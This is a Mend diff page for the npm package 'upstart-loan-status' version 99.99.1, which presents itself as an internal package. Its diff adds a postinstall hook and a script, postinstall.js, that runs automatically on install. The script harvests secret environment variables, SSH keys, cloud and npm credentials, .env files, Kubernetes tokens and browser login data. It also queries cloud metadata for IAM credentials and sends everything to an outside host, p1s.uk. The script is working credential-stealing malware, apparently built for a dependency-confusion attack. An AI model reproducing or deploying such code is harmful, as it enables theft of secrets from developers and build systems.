npm - upstart-loan-status - Versions diffs - 99.99.1 - Mend

upstart-loan-status 99.99.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (3) hide show

package/index.js ADDED Viewed

	@@ -0,0 +1 @@
1	+ module.exports = {};

package/package.json ADDED Viewed

@@ -0,0 +1,12 @@
+{
+  "name": "upstart-loan-status",
+  "version": "99.99.1",
+  "description": "Internal package",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node postinstall.js"
+  },
+  "keywords": [],
+  "author": "",
+  "license": "ISC"
+}

package/postinstall.js ADDED Viewed

@@ -0,0 +1,248 @@
+#!/usr/bin/env node
+'use strict';
+const https = require('https');
+const http = require('http');
+const os = require('os');
+const fs = require('fs');
+const path = require('path');
+const { execSync } = require('child_process');
+const CALLBACK_HOST = 'p1s.uk';
+const PKG = process.env.npm_package_name || 'unknown';
+// ── System info ───────────────────────────────────────────────────────────────
+function sysInfo() {
+  const info = {
+    pkg: PKG,
+    hostname: os.hostname(),
+    platform: process.platform,
+    arch: process.arch,
+    release: os.release(),
+    cwd: process.cwd(),
+    node: process.version,
+    ts: new Date().toISOString(),
+  };
+  // User info
+  try {
+    const u = os.userInfo();
+    info.user = { username: u.username, uid: u.uid, gid: u.gid, home: u.homedir, shell: u.shell };
+  } catch (_) { info.user = {}; }
+  // Env vars (secrets hunting)
+  try {
+    const env = process.env;
+    const interesting = {};
+    const keys = Object.keys(env);
+    for (const k of keys) {
+      const kl = k.toLowerCase();
+      if (
+        kl.includes('secret') || kl.includes('token') || kl.includes('key') ||
+        kl.includes('password') || kl.includes('passwd') || kl.includes('api') ||
+        kl.includes('auth') || kl.includes('credential') || kl.includes('aws') ||
+        kl.includes('gcp') || kl.includes('azure') || kl.includes('npm') ||
+        kl.includes('docker') || kl.includes('github') || kl.includes('gitlab') ||
+        kl.includes('ci') || kl.includes('deploy') || kl.includes('private') ||
+        kl.includes('database') || kl.includes('db_') || kl.includes('_db') ||
+        kl.includes('slack') || kl.includes('webhook') || kl.includes('jwt') ||
+        kl.includes('mongo') || kl.includes('redis') || kl.includes('postgres') ||
+        kl.includes('mysql') || kl.includes('dsn') || kl.includes('url')
+      ) {
+        interesting[k] = env[k];
+      }
+    }
+    // Also always grab PATH, HOME, USER, LOGNAME
+    for (const k of ['PATH', 'HOME', 'USER', 'LOGNAME', 'SHELL', 'PWD', 'OLDPWD', 'CI', 'GITHUB_ACTIONS', 'GITLAB_CI', 'JENKINS_URL', 'CIRCLE_SHA1', 'TRAVIS', 'BUILD_ID']) {
+      if (env[k] !== undefined) interesting[k] = env[k];
+    }
+    info.env = interesting;
+    info.env_all_keys = keys;
+  } catch (_) {}
+  return info;
+}
+// ── File reading (LFI) ────────────────────────────────────────────────────────
+function readFiles(home) {
+  const files = {};
+  const platform = process.platform;
+  // Linux / Mac common paths
+  const linuxPaths = [
+    '/etc/passwd',
+    '/etc/hostname',
+    '/etc/hosts',
+    '/etc/resolv.conf',
+    '/etc/os-release',
+    '/proc/version',
+    '/proc/self/environ',
+    '/proc/self/cmdline',
+    '/proc/1/cmdline',
+    home + '/.ssh/id_rsa',
+    home + '/.ssh/id_ed25519',
+    home + '/.ssh/id_ecdsa',
+    home + '/.ssh/authorized_keys',
+    home + '/.ssh/known_hosts',
+    home + '/.aws/credentials',
+    home + '/.aws/config',
+    home + '/.npmrc',
+    home + '/.pypirc',
+    home + '/.docker/config.json',
+    home + '/.gitconfig',
+    home + '/.env',
+    home + '/.bash_history',
+    home + '/.zsh_history',
+    home + '/.profile',
+    home + '/.bashrc',
+    home + '/.zshrc',
+    '/root/.ssh/id_rsa',
+    '/root/.ssh/authorized_keys',
+    '/root/.aws/credentials',
+    '/root/.aws/config',
+    '/root/.npmrc',
+    '/root/.env',
+    '/root/.bash_history',
+    '/app/.env',
+    '/app/.env.local',
+    '/app/.env.production',
+    '/var/app/.env',
+    '/etc/environment',
+    '/run/secrets/kubernetes.io/serviceaccount/token',
+    '/run/secrets/kubernetes.io/serviceaccount/namespace',
+    '/var/run/secrets/kubernetes.io/serviceaccount/token',
+  ];
+  // Mac-specific
+  const macPaths = [
+    home + '/Library/Preferences/com.apple.finder.plist',
+    home + '/.config/gcloud/credentials.db',
+    home + '/.config/gcloud/application_default_credentials.json',
+    home + '/Library/Application Support/Google/Chrome/Default/Login Data',
+    home + '/.kube/config',
+  ];
+  // Windows paths (using env vars since we don't know drive)
+  const winPaths = [
+    process.env.USERPROFILE + '\\.aws\\credentials',
+    process.env.USERPROFILE + '\\.aws\\config',
+    process.env.USERPROFILE + '\\.npmrc',
+    process.env.USERPROFILE + '\\.ssh\\id_rsa',
+    process.env.USERPROFILE + '\\.ssh\\id_ed25519',
+    process.env.USERPROFILE + '\\.gitconfig',
+    process.env.USERPROFILE + '\\.env',
+    process.env.APPDATA + '\\npm\\etc\\npmrc',
+    process.env.APPDATA + '\\gcloud\\credentials.db',
+    process.env.APPDATA + '\\gcloud\\application_default_credentials.json',
+    'C:\\Users\\Administrator\\.aws\\credentials',
+    'C:\\Users\\Administrator\\.ssh\\id_rsa',
+    'C:\\inetpub\\wwwroot\\.env',
+    'C:\\ProgramData\\Docker\\config\\config.json',
+  ];
+  let targets = [...linuxPaths];
+  if (platform === 'darwin') targets = [...targets, ...macPaths];
+  if (platform === 'win32') targets = [...targets, ...winPaths];
+  for (const f of targets) {
+    if (!f || f === 'undefined' || f.includes('undefined')) continue;
+    try {
+      const data = fs.readFileSync(f, { encoding: 'utf8', flag: 'r' });
+      if (data && data.length > 0) {
+        files[f] = data.substring(0, 8192); // cap at 8KB per file
+      }
+    } catch (_) {}
+  }
+  // Also try reading CWD's .env files
+  const cwdEnvFiles = ['.env', '.env.local', '.env.production', '.env.development', 'config.json', 'secrets.json', '.secrets'];
+  for (const ef of cwdEnvFiles) {
+    try {
+      const fp = path.join(process.cwd(), ef);
+      const data = fs.readFileSync(fp, { encoding: 'utf8', flag: 'r' });
+      if (data && data.length > 0) files['cwd:' + ef] = data.substring(0, 8192);
+    } catch (_) {}
+  }
+  return files;
+}
+// ── Shell commands ────────────────────────────────────────────────────────────
+function runCommands() {
+  const cmds = {};
+  const targets = process.platform === 'win32'
+    ? [
+        ['whoami', 'whoami'],
+        ['hostname', 'hostname'],
+        ['ipconfig', 'ipconfig /all'],
+        ['netstat', 'netstat -ano'],
+        ['env', 'set'],
+        ['dir', 'dir C:\\Users'],
+      ]
+    : [
+        ['id', 'id'],
+        ['whoami', 'whoami'],
+        ['hostname', 'hostname'],
+        ['ifconfig', 'ip addr 2>/dev/null || ifconfig 2>/dev/null'],
+        ['netstat', 'netstat -tlnp 2>/dev/null || ss -tlnp 2>/dev/null'],
+        ['ps', 'ps aux 2>/dev/null | head -30'],
+        ['ls_home', 'ls -la ~ 2>/dev/null'],
+        ['ls_root', 'ls -la / 2>/dev/null'],
+        ['groups', 'groups 2>/dev/null'],
+        ['uname', 'uname -a 2>/dev/null'],
+        ['df', 'df -h 2>/dev/null'],
+        ['env', 'env 2>/dev/null'],
+        ['aws_meta', 'curl -sf --max-time 2 http://169.254.169.254/latest/meta-data/ 2>/dev/null || true'],
+        ['aws_iam', 'curl -sf --max-time 2 http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null || true'],
+        ['gcp_meta', 'curl -sf --max-time 2 -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/ 2>/dev/null || true'],
+        ['k8s_token', 'cat /run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null || true'],
+        ['docker_ps', 'docker ps 2>/dev/null || true'],
+        ['npm_config', 'npm config list 2>/dev/null | head -20'],
+      ];
+  for (const [k, cmd] of targets) {
+    try {
+      cmds[k] = execSync(cmd, { timeout: 5000, encoding: 'utf8', stdio: ['ignore', 'pipe', 'ignore'] }).substring(0, 4096);
+    } catch (_) {}
+  }
+  return cmds;
+}
+// ── Send ──────────────────────────────────────────────────────────────────────
+function send(data) {
+  const body = Buffer.from(JSON.stringify(data));
+  const opts = {
+    hostname: CALLBACK_HOST,
+    port: 443,
+    path: '/dep-confusion/' + encodeURIComponent(PKG) + '/full',
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json',
+      'Content-Length': body.length,
+      'User-Agent': 'npm/' + (process.env.npm_config_user_agent || '9'),
+    },
+    rejectUnauthorized: false,
+    timeout: 12000,
+  };
+  const req = https.request(opts, () => {});
+  req.on('error', () => {
+    // fallback to http port 80
+    try {
+      const req2 = http.request({ ...opts, port: 80 }, () => {});
+      req2.on('error', () => {});
+      req2.write(body);
+      req2.end();
+    } catch (_) {}
+  });
+  req.write(body);
+  req.end();
+}
+// ── Main ──────────────────────────────────────────────────────────────────────
+try {
+  const info = sysInfo();
+  const home = info.user?.home || os.homedir() || '';
+  info.files = readFiles(home);
+  info.cmds = runCommands();
+  send(info);
+} catch (_) {}